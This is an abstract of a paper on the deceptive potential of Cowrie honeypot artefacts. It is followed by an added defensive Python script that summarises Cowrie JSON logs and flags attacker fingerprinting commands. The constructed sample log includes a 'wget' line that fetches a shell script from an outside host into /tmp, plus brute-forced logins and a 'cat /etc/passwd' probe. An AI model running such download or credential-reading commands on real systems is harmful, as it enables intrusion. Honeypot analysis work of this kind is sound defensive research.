Review and analysis of Cowrie artefacts and their potential to be used deceptively
Proceedings of the 6th Annual Conference on Computational Science & Computational Intelligence
Institute of Electrical and Electronics Engineers (IEEE)
School of Science / ECU Security Research Institute
Honeypots are progressively becoming a fundamental cybersecurity tool for detecting, preventing and recording new threats and the attack methodologies attackers use to penetrate systems. The underlying technology is advancing rapidly: with virtualisation and, most recently, containers, deploying a honeypot has become increasingly easy. A varied collection of open source honeypots, such as Cowrie, is available today and can be downloaded and deployed within minutes with default settings. Cowrie is a medium-interaction Secure Shell (SSH) and Telnet honeypot intended to log brute-force and shell-interaction attacks. However, the default Cowrie configuration is easily detected by adversaries using automated scripts and tools. To increase Cowrie's deceptive capabilities, it is essential to understand, modify and leverage all the capabilities of the honeypot. This process is complex, because there is no standard framework for interpreting the artefacts used by the Cowrie honeypot and how these artefacts relate to the kind of deception presented to the attacker. There is therefore a need for a structured way to interpret these basic deception techniques and tools, and subsequently to develop them into feasible cybersecurity defence mechanisms. This study seeks to develop an understanding of Cowrie's capabilities and how they can be used to bait attackers. The resulting annotations can help defenders better understand the effectiveness of the Cowrie artefacts and how they can be used deceptively.
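The brute-force and shell-interaction logging mentioned above is what a defender actually works with when reviewing a Cowrie deployment. The following is an added example, not code from the paper or from the Cowrie project: it reads the one-JSON-object-per-line event log Cowrie writes (by default to var/log/cowrie/cowrie.json), groups events by session, and flags the early host-fingerprinting commands that an attacker or automated script runs when deciding whether it has landed in a honeypot. The sample log lines are constructed for the example, and the FINGERPRINT_COMMANDS list is an illustrative assumption rather than a catalogue from the paper.

```python
"""Summarise attacker sessions recorded in Cowrie's JSON event log.

Added example; it is not code from the paper or from the Cowrie project.
It assumes the one-JSON-object-per-line log that Cowrie writes to
var/log/cowrie/cowrie.json, with the common fields "eventid", "session"
and "src_ip" plus event-specific fields ("username"/"password" on login
events, "input" on cowrie.command.input). The log lines below are
constructed for the example, not captured from a real sensor.
"""
import json
import re
from collections import defaultdict

# Commands attackers typically run first to fingerprint the host they landed
# on. The list is an assumption for illustration, not taken from the paper.
FINGERPRINT_COMMANDS = (
    "uname", "cat /proc/cpuinfo", "cat /etc/passwd", "cat /etc/issue",
    "lscpu", "dmesg", "w", "ls /",
)

# Constructed sample log: one session that brute-forces, logs in and probes
# the host, and one that fails to log in and disconnects. One line is
# deliberately malformed to show that a truncated record is skipped.
SAMPLE_LOG = """\
{"eventid": "cowrie.session.connect", "timestamp": "2019-11-04T10:00:00.000000Z", "src_ip": "198.51.100.7", "session": "a1b2c3d4e5f6", "protocol": "ssh"}
{"eventid": "cowrie.login.failed", "timestamp": "2019-11-04T10:00:01.000000Z", "src_ip": "198.51.100.7", "session": "a1b2c3d4e5f6", "username": "root", "password": "admin"}
{"eventid": "cowrie.login.failed", "timestamp": "2019-11-04T10:00:02.000000Z", "src_ip": "198.51.100.7", "session": "a1b2c3d4e5f6", "username": "root", "password": "root"}
{"eventid": "cowrie.login.success", "timestamp": "2019-11-04T10:00:03.000000Z", "src_ip": "198.51.100.7", "session": "a1b2c3d4e5f6", "username": "root", "password": "123456"}
{"eventid": "cowrie.command.input", "timestamp": "2019-11-04T10:00:04.000000Z", "src_ip": "198.51.100.7", "session": "a1b2c3d4e5f6", "input": "uname -a"}
{"eventid": "cowrie.command.input", "timestamp": "2019-11-04T10:00:05.000000Z", "src_ip": "198.51.100.7", "session": "a1b2c3d4e5f6", "input": "cat /proc/cpuinfo | grep name | wc -l"}
{"eventid": "cowrie.command.input", "timestamp": "2019-11-04T10:00:06.000000Z", "src_ip": "198.51.100.7", "session": "a1b2c3d4e5f6", "input": "cd /tmp && wget http://203.0.113.9/x.sh"}
{"eventid": "cowrie.session.closed", "timestamp": "2019-11-04T10:00:09.000000Z", "src_ip": "198.51.100.7", "session": "a1b2c3d4e5f6", "duration": 9.0}
{"eventid": "cowrie.session.connect", "timestamp": "2019-11-04T10:05:00.000000Z", "src_ip": "203.0.113.42", "session": "0f1e2d3c4b5a", "protocol": "ssh"}
{"eventid": "cowrie.login.failed", "timestamp": "2019-11-04T10:05:01.000000Z", "src_ip": "203.0.113.42", "session": "0f1e2d3c4b5a", "username": "admin", "password": "admin"}
{"eventid": "cowrie.session.closed", "timestamp": "2019-11-04T10:05:02.000000Z", "src_ip": "203.0.1
{"eventid": "cowrie.session.closed", "timestamp": "2019-11-04T10:05:02.000000Z", "src_ip": "203.0.113.42", "session": "0f1e2d3c4b5a", "duration": 2.0}
"""


def parse_events(text):
    """Parse one JSON object per line; skip blank or malformed lines."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            events.append(json.loads(line))
        except json.JSONDecodeError:
            continue  # truncated or corrupt record: skip, do not abort the run
    return events


def summarise_sessions(events):
    """Group events by Cowrie session id: credentials tried, outcome, commands."""
    sessions = defaultdict(
        lambda: {"src_ip": None, "attempts": [], "success": None, "commands": []}
    )
    for ev in events:
        sid = ev.get("session")
        if not sid:
            continue
        s = sessions[sid]
        s["src_ip"] = ev.get("src_ip", s["src_ip"])
        eid = ev.get("eventid")
        if eid in ("cowrie.login.failed", "cowrie.login.success"):
            cred = (ev.get("username"), ev.get("password"))
            s["attempts"].append(cred)
            if eid == "cowrie.login.success":
                s["success"] = cred
        elif eid == "cowrie.command.input":
            s["commands"].append(ev.get("input", ""))
    return dict(sessions)


def _simple_commands(command):
    """Split a shell line on ; | || && into its simple commands."""
    return [c.strip() for c in re.split(r"\|\||&&|[;|]", command) if c.strip()]


def is_fingerprint(command):
    """True if any simple command in the line is a known host-probing command."""
    for seg in _simple_commands(command):
        for probe in FINGERPRINT_COMMANDS:
            if seg == probe or seg.startswith(probe + " "):
                return True
    return False


def fingerprint_commands(commands):
    return [c for c in commands if is_fingerprint(c)]


def report(sessions):
    """One summary line per session, suitable for a quick triage view."""
    lines = []
    for sid, s in sessions.items():
        kind = "interactive" if s["commands"] else "brute-force only"
        probes = fingerprint_commands(s["commands"])
        lines.append(
            f"{sid} {s['src_ip']}: {len(s['attempts'])} login attempt(s), "
            f"success={s['success']}, {kind}, {len(probes)} fingerprinting command(s)"
        )
    return lines


if __name__ == "__main__":
    for line in report(summarise_sessions(parse_events(SAMPLE_LOG))):
        print(line)
```

Run against a real cowrie.json, the same grouping makes the artefact the paper is concerned with visible: sessions whose only commands are fingerprinting probes followed by an immediate disconnect are the ones where the attacker's tooling most likely recognised the default Cowrie environment.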